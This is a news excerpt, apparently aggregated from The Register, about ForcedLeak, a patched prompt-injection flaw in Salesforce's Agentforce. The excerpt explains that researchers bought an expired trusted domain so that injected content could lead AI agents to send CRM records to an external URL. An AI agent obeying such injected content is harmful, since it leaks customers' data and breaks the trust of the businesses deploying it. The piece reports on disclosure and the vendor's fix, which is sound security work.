"A now-fixed flaw in Salesforce's Agentforce could have allowed external attackers to steal sensitive customer data via prompt injection, according to security researchers who published a proof-of-concept attack on Thursday. They were aided by an expired trusted domain that they were able to buy for a measly five bucks. Agentforce is the CRM giant's tool for creating AI agents to automate various tasks. The vulnerability stems from a DNS misconfiguration within the agentic AI platform."
"Salesforce declined to answer The Register's questions about ForcedLeak, including whether the flaw was abused and sensitive data disclosed, but told us it had fixed the flaw. As of September 8, the company began enforcing trusted URL allow-lists for its Agentforce and Einstein Generative AI agents to ensure that no one can call a malicious link through prompt injection. "Salesforce is aware of the vulnerability reported by Noma and has released patches that prevent output in Agentforce agents from being sent to untrusted URLs," a Salesforce spokesperson told The Register in an emailed statement."
A DNS misconfiguration in Salesforce Agentforce allowed AI agents to follow malicious links and exfiltrate CRM records through prompt injection. Attackers exploited an expired trusted domain purchased cheaply to trick agents into returning sensitive customer data to external URLs. The vulnerability, named ForcedLeak, demonstrates how prompt injection and mixed external data can break trust boundaries and turn human-AI interfaces into social engineering targets. Salesforce patched Agentforce to prevent agents from retrieving CRM records and sending output to untrusted URLs and began enforcing trusted URL allow-lists for Agentforce and Einstein Generative AI agents. The issue highlights risks of AI-integrated business tools operating without human oversight.
Read at Theregister
Unable to calculate read time
Collection
[
|
...
]